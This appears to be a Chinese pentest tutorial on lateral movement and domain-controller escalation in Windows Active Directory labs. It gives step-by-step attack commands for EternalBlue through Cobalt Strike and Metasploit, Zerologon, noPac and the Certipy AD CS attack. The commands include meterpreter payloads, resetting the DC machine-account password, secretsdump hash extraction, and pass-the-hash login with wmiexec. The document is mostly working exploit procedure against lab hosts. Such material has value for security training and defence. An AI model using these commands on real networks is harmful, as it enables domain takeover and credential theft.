章節(jié)點(diǎn)

IPC，WMI，SMB，PTH，PTK，PTT，SPN，WinRM，WinRS，RDP,Plink，DCOM，SSH；Exchange，LLMNR投毒，Kerberos_TGS，GPO&DACL，域控提權(quán)漏洞，約束委派，數(shù)據(jù)庫(kù)攻防，系統(tǒng)補(bǔ)丁下發(fā)執(zhí)行，EDR定向下發(fā)執(zhí)行等。

橫向移動(dòng)-系統(tǒng)漏洞-CVE-2017-0146(永恒之藍(lán))

CVE-2017-0146(MS17010)

影響版本

Windows 7 8.1 10; Windows Server 2008 2012 2016
隨著新系統(tǒng)初始狀態(tài)已經(jīng)打上了補(bǔ)丁，漏洞利用將會(huì)越來越局限

插件檢測(cè)-橫向移動(dòng)

CS聯(lián)動(dòng)MSF-檢測(cè)&利用

cs(各種插件)只支持漏洞檢測(cè)，不支持漏洞的利用，所以將新建一個(gè)會(huì)話移交給msf進(jìn)行進(jìn)一步的利用
1、CS創(chuàng)建外聯(lián)監(jiān)聽器

2、CS執(zhí)行聯(lián)動(dòng)MSF

也可以手工在cs輸入命令

spawn back_msf

3、MSF監(jiān)聽聯(lián)動(dòng)配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8787
run

4、添加路由

run autoroute -p //查看當(dāng)前路由表
run post/multi/manage/autoroute //添加當(dāng)前路由表

5、檢測(cè)模塊(檢測(cè)是否存在永恒之藍(lán)漏洞)

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //設(shè)置掃描目標(biāo)段
set threads 5 //設(shè)置掃描線程數(shù)
run 

6、利用模塊

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向連接上線
set rhost 192.168.3.25 //設(shè)置連接目標(biāo)		#set rhosts 192.168.3.21-32 //設(shè)置掃描范圍，批量檢測(cè)與利用
run

橫向移動(dòng)-域控提權(quán)-CVE-2014-6324

見往期文章PTT橫向移動(dòng)CVE-2014-6324 漏洞利用
https://blog.csdn.net/weixin_53009585/article/details/129788657

橫向移動(dòng)-域控提權(quán)-CVE-2020-1472

影響版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows
Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core
installation) Windows Server 2012 Windows Server 2012 (Server Core
installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server
Core installation) Windows Server 2016 Windows Server 2016 (Server
Core installation) Windows Server 2019 Windows Server 2019 (Server
Core installation) Windows Server, version 1903 (Server Core
installation) Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

重置密碼：
https://github.com/dirkjanm/CVE-2020-1472
恢復(fù)密碼：
https://github.com/risksense/zerologon
https://github.com/SecureAuthCorp/impacket
0、獲取計(jì)算機(jī)名：
nbtscan -v -h 192.168.3.21
1、連接DC清空憑證：
proxychains python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
2、獲取域內(nèi)HASH:
proxychains python secretsdump.py OWA2010CN-GOD$@192.168.3.21 -just-dc -no-pass
3、連接域控PTH：
python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21
4、后續(xù)恢復(fù)密碼：

橫向移動(dòng)-域控提權(quán)-CVE-2021-42287

前提條件

一個(gè)域內(nèi)普通賬號(hào)
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

影響版本

Windows基本全系列

python版本EXP

https://github.com/WazeHell/sam-the-admin

利用過程

windows下(貌似不能使用)：報(bào)錯(cuò) ‘KRB5CCNAME’ 不是內(nèi)部或外部命令，也不是可運(yùn)行的程序
或批處理文件。

看了下github項(xiàng)目詳情 只能在kali下運(yùn)行

等了兩年都沒有再更新了……
kali下：這里的kali是22年版本，靶機(jī)也是之前的god.org中的DC,旨在使用域主機(jī)普通賬號(hào)利用漏洞獲得域控DCsystem權(quán)限。當(dāng)然還是需要使用代理

C#版本EXP

項(xiàng)目地址：https://github.com/cube0x0/noPac

利用過程：

1、使用代理后：
修改Host綁定域名和IP
2、掃描探針：

noPac scan -domain god.org -user webadmin -pass admin!@#45

3、利用連接：

noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd

橫向移動(dòng)-域控提權(quán)-CVE-2022-26923

項(xiàng)目地址：https://github.com/ly4k/Certipy
Certipy是一款基于Python開發(fā)的強(qiáng)大工具，該工具可以幫助廣大研究人員枚舉并利用活動(dòng)目錄證書服務(wù)（AD CS）中的錯(cuò)誤配置項(xiàng)。

概述

當(dāng)Windows系統(tǒng)的Active Directory證書服務(wù)（CS）在域上運(yùn)行時(shí)，由于機(jī)器賬號(hào)中的dNSHostName屬性不具有唯一性，域中普通用戶可以將其更改為高權(quán)限的域控機(jī)器賬號(hào)屬性，然后從Active Directory證書服務(wù)中獲取域控機(jī)器賬戶的證書，導(dǎo)致域中普通用戶權(quán)限提升為域管理員權(quán)限。

影響

Win8.1、Win10、Win11、WinServer2012R2、WinServer2016、WinServer2019、WinServer2022等版本

前提條件

1、一個(gè)域內(nèi)普通賬號(hào)
2、域內(nèi)存在證書服務(wù)器
DC沒有安裝Active Directory證書服務(wù)

DC已安裝Active Directory證書服務(wù)

Kali添加訪問域內(nèi)信息 /etc/hosts

192.168.3.130 xiaodi.local
192.168.3.130 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.3.130 WIN-3C7SS32SQ6R.xiaodi.local

獲取CA結(jié)構(gòu)名和計(jì)算機(jī)名

certutil -config - -ping

域內(nèi)信息

192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

1、申請(qǐng)低權(quán)限用戶證書：

certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

2、檢測(cè)證書

certipy auth -pfx test.pfx

3、創(chuàng)建一個(gè)機(jī)器賬戶：

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 addComputer pwnmachine 'CVEPassword1234*'

4、設(shè)置機(jī)器賬戶屬性(dNSHostName和DC一致)：

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

5、再次申請(qǐng)證書：

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.130' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

6、檢測(cè)證書：

certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.3.130

7、導(dǎo)出HASH：

python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4

8、利用HASH：

python3 wmiexec.py xiaodi.local/administrator@192.168.3.130 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd